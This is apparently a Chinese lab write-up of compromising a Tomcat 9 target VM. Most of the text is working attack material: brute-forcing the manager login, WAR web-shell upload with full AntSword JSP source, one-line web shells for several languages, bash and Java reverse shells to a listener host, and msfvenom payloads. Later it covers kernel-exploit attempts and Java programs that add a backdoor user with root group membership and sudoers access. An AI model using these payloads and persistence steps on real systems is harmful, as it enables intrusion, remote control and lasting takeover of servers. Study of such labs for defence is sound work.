Apache Tomcat，是世界上最广泛使用的Java Web服务器之一。带有默认配置的Tomcat服务器非常容易发现。发现暴露Web应用管理器的服务器也非常容易，它是一个应用，允许管理员启动、停止、添加和删除服务器中的应用。

信息搜集

第一步：启动主机并进行

1、查看tomcat靶机IP地址、扫描地址所开放端口

arp-scan -l

192.168.245.248

nmap -T4 -A -v 192.168.245.248

得到，此网站应用的是Apache Tomcat/9.0.31

普及：

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP 程序的首选。对于一个初学者来说，可以这样认为，当在一台机器上配置好Apache 服务器，可利用它响应HTML（标准通用标记语言下的一个应用）页面的访问请求。实际上Tomcat是Apache 服务器的扩展，但运行时它是独立运行的，所以当你运行tomcat 时，它实际上作为一个与Apache 独立的进程单独运行的。

Tomcat的目录结构

/bin #二进制文件

startup.bat #启动tomcat服务

shutdown.bat #关闭tomcat服务

/conf #配置文件

sever.xml #定义了tomcat启动时涉及的组件属性

tomcat-users.xml #tomcat的用户密码和权限

web.xml #定义servlet

/lib #存放全局的jar包

/logs #日志

/temp #临时文件

/webapps #存放JAVA的WEB项目

/manager #后台登录界面

/ROOT #根目录

/work #存放jsp编译后产生的class文件

2、根据网页进行web爬行后台登陆界面

dirb http://192.168.245.248:8080/

3、访问管理登陆界面

查询资料可知，tomcat默认管理员用户名为tomcat

4、通过burp suite进行抓包破解密码

选择爆破的方式为Sniper并将Basic后面那串base64加密的账号密码Add$：

这串内容了解到是base64加密：BASE64加密解密

这里为突破口

Payloads设定为选择：Custom iterator

Custom iterator这里是指相当于把一条爆破语句拆成三个部分：账号:密码

第一部分加载用户字典，第二部分输入英文符号: ,第三部分加载密码字典

选择加密方式为Encode内的base64加密

去掉url勾选

开始爆破：

使用用户名：tomcat，密码：tomcat 进入到 Manager 页面

方法2：

1、启用MMetasploit

msfconsole

2、查看使用参数

use auxiliary/scanner/tomcat_mgr_login

3、设置目标主机

set rhosts 192.168.245.248

4、服务器由于太多请求而崩溃，所以我们降低爆破的速度：
set threads 5

set brutefoce_speed 3

run

在 Manager 页面上传 war 包即可直接 getshell ：

war 包是 Sun 提出的一种 web 应用程序格式。它与 jar 类似，是很多文件的压缩包。war 包中的文件按照一定目录结构来组织。

一般其根目录下包含有 html 和 jsp 文件，或者包含有这两种文件的目录，另外还有 WEB-INF 目录。通常在 WEB-INF 目录下含有一个 web.xml 文件和一个 classes 目录。web.xml 是这个应用的配置文件，而 classes 目录下则包含编译好的 servlet 类和 jsp，或者 servlet 所依赖的其他类（如 JavaBean）。通常这些所依赖的类也可以打包成 jar 包放在 WEB-INF 下的 lib 目录下。

注：

制作war木马， 将ma.jsp小马放在JDK_HOME/bin目录下

<% if(request.getParameter(“f”)!=null)(new
java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());
%>

cmd进入JDK_HOME/bin目录，运行"jar cvf shell.war ma.jsp",生成shell.war小马文件

war包木马制作成功

<%--
             _   ____                       _
  __ _ _ __ | |_/ ___|_      _____  _ __ __| |
 / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
| (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
 \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
———————————————————————————————————————————————
    AntSword JSP Defineclass Zlib deflated Script
    警告：
        此脚本仅供合法的渗透测试以及爱好者参考学习
         请勿用于非法用途，否则将追究其相关责任！
———————————————————————————————————————————————
pass: ant
encoder: https://github.com/AntSwordProject/AwesomeEncoder/blob/master/jsp/encoder/zlib_deflated_class.js
--%>
<%@page import="java.util.*,java.io.*,java.util.zip.*"%>
<%!
  class U extends ClassLoader {
    U(ClassLoader c) {
      super(c);
    }
    public Class g(byte[] b) {
      return super.defineClass(b, 0, b.length);
    }
  }
  public byte[] decompress(byte[] data) {
    byte[] output = new byte[0];
    Inflater dc = new Inflater();
    dc.reset();
    dc.setInput(data);
    ByteArrayOutputStream o = new ByteArrayOutputStream(data.length);
    try {
      byte[] buf = new byte[1024];
      while (!dc.finished()) {
        int i = dc.inflate(buf);
        o.write(buf, 0, i);
      }
      output = o.toByteArray();
    } catch (Exception e) {
        output = data;
        e.printStackTrace();
    } finally {
      try {
          o.close();
      } catch (IOException e) {
          e.printStackTrace();
      }
    }
    dc.end();
    return output;
  }
  public byte[] base64Decode(String str) throws Exception {
    try {
      Class clazz = Class.forName("sun.misc.BASE64Decoder");
      return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
      Class clazz = Class.forName("java.util.Base64");
      Object decoder = clazz.getMethod("getDecoder").invoke(null);
      return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
  }
%>
<%
  String cls = request.getParameter("ant");
  if (cls != null) {
    new U(this.getClass().getClassLoader()).g(decompress(base64Decode(cls))).newInstance().equals(pageContext);
  }
%>

成功后上传至服务器上

访问包的路径

知识积累：

PHP一句话木马：<?php @eval($_POST['key']);?>

ASP一句话木马：<%eval request['key']%>

ASPX一句话木马：<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%>

jsp一句话木马：

<% if(request.getParameter(“f”)!=null)(new

java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());

%>

（提交url为 http://localhost/1.jsp?f=1.txt&;t=hello

访问http://localhost/1.txt 出来hello）

执行系统命令：

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

请求：http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls

执行之后不会有任何回显，用来反弹个shell很方便。

脚本地址下载：

GitHub - AntSwordProject/AwesomeScript: AntSword Shell 脚本分享/示例

注：

查看文件位置

在Applications中可以看到我们刚才上传的木马文件

• 而我们的木马文件则在这个目录下面
• 也就是我们刚才.war的文件名 【自定义】下面
• 再加上我们刚才生成的.jsp的这个文件名
• 就构造了我们可以用蚁剑进行连接的URL

最后通过中国蚁剑连接测试：

linux内部基础信息收集

1、查看系统账户

2、权限不允许查找flag.txt文件

3、uname -a 显示全部系统信息

4、cat /etc/issue 内核信息。此命令也适用于所有的Linux发行版

5、cat /etc/passwd 所有人都可看（查看用户）

6、ps aux | grep root

6、查看文件所属权限

ls-al

7、查看内核信息cat /proc/version

 

8、有无明文存放用户密码

grep -i user [filename]
 grep -i pass [filename]
 grep -C 5 "password" [filename]
 find / -name "*.php" -print0 | xargs -0 grep -i -n "var $password"

9、cat /proc/$$/status | grep "[UG]id"

10、查看Linux进程

ps -axjf/ps -ef

11、ls -alh

12、漏洞扫描

kaliLinux为例：git clone GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool

chmod +x linux-exploit-suggester

./linux-exploit-suggester.sh

可能存在的提权漏洞

下载linux-exploit-suggester.sh文件上传至tomcat靶机执行检测靶机可能存在的漏洞

1、通过 SSH 爆破 root 密码 XXX

SSH 服务的配置文件有为两个，分别是：

• /etc/ssh/ssh_config : 客户端的配置文件
• /etc/ssh/sshd_config : 服务端的配置文件

仅当 /etc/ssh/sshd_config 中 PermitRootLogin 设置为 yes，root 用户才能登录 ssh：

2、检查内核漏洞 XXX

2.1脏牛漏洞

编译好的EXP下载地址： GitHub - Brucetg/DirtyCow-EXP: 编译好的脏牛漏洞（CVE-2016-5195）EXP

（一般将文件上传至tmp文件夹，相对权限高一些）

2.2将文件设置成可执行文件

chmod +x 文件名

chmod 775 +文件名

2.3、gitbub查询相关脏牛提权脚本c文件 XXXX

设置本地环境

gcc -pthread [文件名].c -o 文件名 -lcrypt

将编译好的可执行文件上传至服务器中（最好和靶机相同的环境通过GCC编译）

设置成可执行文件

chmod +x [文件名]

再执行 ./文件名 hello123

（失败）XXXXXX

2.4、利用kaliLinux反弹shell

nc -lvp 2333

靶机输入：

bash -i >& /dev/tcp/192.168.245.193/2333 0>&1

2.5MSF执行jar包

MSF进行监听

msfconsole

use exploit/multi/handler

set payload java/shell_reverse_tcp

set LHOST 192.168.245.193

set LPORT 7777

exploit

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.245.193 lport=4444 -f elf >4444.elf

2.6测试执行：

python -c 'import pty;pty.spawn("/bin/bash")'

3、本地溢出漏洞提权？X

4、服务器配置问题？X

5、漏洞扫描？X

6、find提权？X

7、有数据库UDF提权？X

8、SUID提权？X

9、plokit提权？Linux本地环境测试可以，但在靶机无法提权

exp1链接：GitHub - luijait/PwnKit-Exploit: Proof of Concept (PoC) CVE-2021-4034

编译后执行文件

10、利用Java代码执行命令

测试利用java脚本反弹shell √

public class hw {
    public static void main(String[] args) {
        Runtime r = Runtime.getRuntime();
        Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.245.193/2334 0>&1"});
        p.waitFor();
    }
}

public class Revs {
    public static void main(String[] args) throws Exception { 
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.245.193/2334;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd); p.waitFor();
    }
}

1、查看Java环境

// package com.company;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
public class HelloWorld {
    public static void main(String[] args) throws IOException, InterruptedException {
        Process p = Runtime.getRuntime().exec("whoami");
        java.io.InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is, Charset.forName("GBK"))); //设置读取的时候的编码为GBK
        p.waitFor();
        if(p.exitValue()!=0){
            //说明命令执行失败
        }else{
            String s = null;
            while((s=reader.readLine())!=null){
                System.out.println(s);
            }
        }
    }
}

 

2、继续使用Java脚本

# 创建用户 useradd username

// package com.company;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
public class HelloWorld {
    public static void main(String[] args) throws IOException, InterruptedException {
        Process p = Runtime.getRuntime().exec("useradd Monster");
        java.io.InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is, Charset.forName("GBK"))); //设置读取的时候的编码为GBK
        p.waitFor();
        if(p.exitValue()!=0){
            //说明命令执行失败
        }else{
            String s = null;
            while((s=reader.readLine())!=null){
                System.out.println(s);
            }
        }
    }
}

 

3、#创建密码 echo "password" | passwd --stdin username

方法一：echo '123.com' | passwd --stdin Monster

// package com.company;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
public class HelloWorld {
    public static void main(String[] args) throws IOException, InterruptedException {
        Process p = Runtime.getRuntime().exec("echo '123.com' | passwd --stdin Monster");
        java.io.InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is, Charset.forName("GBK"))); //设置读取的时候的编码为GBK
        p.waitFor();
        if(p.exitValue()!=0){
            //说明命令执行失败
        }else{
            String s = null;
            while((s=reader.readLine())!=null){
                System.out.println(s);
            }
        }
    }
}

知识点：

使用base64命令加密linux命令并执行

echo "ls -l" | base64 加密

echo bHMgLWwK | base64 -d | sh 解密

方法二：添加Monster 用户密码脚本

new String[]{"sh", "-c", "echo '123.com' | passwd --stdin Monster"}

// package com.company;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
public class HelloWorld {
    public static void main(String[] args) throws IOException, InterruptedException {
        Process p = Runtime.getRuntime().exec(new String[]{"sh", "-c", "echo '123.com' | passwd --stdin Monster"});
        java.io.InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is, Charset.forName("GBK"))); //设置读取的时候的编码为GBK
        p.waitFor();
        if(p.exitValue()!=0){
            //说明命令执行失败
        }else{
            String s = null;
            while((s=reader.readLine())!=null){
                System.out.println(s);
            }
        }
    }
}

4、将Monster账户添加到root组

usermod -g root Monster

// package com.company;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
public class HelloWorld {
    public static void main(String[] args) throws IOException, InterruptedException {
        Process p = Runtime.getRuntime().exec("usermod -g root Monster");
        java.io.InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is, Charset.forName("GBK"))); //设置读取的时候的编码为GBK
        p.waitFor();
        if(p.exitValue()!=0){
            //说明命令执行失败
        }else{
            String s = null;
            while((s=reader.readLine())!=null){
                System.out.println(s);
            }
        }
    }
}

远程登陆测试

ssh Monster@192.168.245.249

sudo vim /etc/ssh/sshd_config 增加如下修改 PasswordAuthentication yes

PermitRootLogin yes #允许root认证登录

PasswordAuthentication yes #允许密码认证

先查看sshd_config文件

// package com.company;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
public class HelloWorld {
    public static void main(String[] args) throws IOException, InterruptedException {
        Process p = Runtime.getRuntime().exec(new String[]{"sh", "-c", "cat /etc/ssh/sshd_config"});
        java.io.InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is, Charset.forName("GBK"))); //设置读取的时候的编码为GBK
        p.waitFor();
        if(p.exitValue()!=0){
            //说明命令执行失败
        }else{
            String s = null;
            while((s=reader.readLine())!=null){
                System.out.println(s);
            }
        }
    }
}

5、修改配置文件

*SSH服务中参数PasswordAuthentication的默认值为yes，将其值置为no以禁用密码验证登录，导致此类故障。需要修改PasswordAuthentication配置解决此问题。

echo 'PasswordAuthentication yes'>> /etc/ssh/sshd_config

// package com.company;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
public class HelloWorld {
    public static void main(String[] args) throws IOException, InterruptedException {
        Process p = Runtime.getRuntime().exec(new String[]{"sh", "-c", "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"});
        java.io.InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is, Charset.forName("GBK"))); //设置读取的时候的编码为GBK
        p.waitFor();
        if(p.exitValue()!=0){
            //说明命令执行失败
        }else{
            String s = null;
            while((s=reader.readLine())!=null){
                System.out.println(s);
            }
        }
    }
}

知识点：重定向标识符 >（覆盖掉原来文件）>>（在文件后添加）

测试远程登陆

6、提升sudo没权限

将Monster用户添加至sudoers文件内

Monster ALL=(ALL) ALL

// package com.company;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
public class HelloWorld {
    public static void main(String[] args) throws IOException, InterruptedException {
        Process p = Runtime.getRuntime().exec(new String[]{"sh", "-c", "echo 'Monster ALL=(ALL) ALL' >> /etc/sudoers"});
        java.io.InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is, Charset.forName("GBK"))); //设置读取的时候的编码为GBK
        p.waitFor();
        if(p.exitValue()!=0){
            //说明命令执行失败
        }else{
            String s = null;
            while((s=reader.readLine())!=null){
                System.out.println(s);
            }
        }
    }
}

通过sudo su口令进入到root账户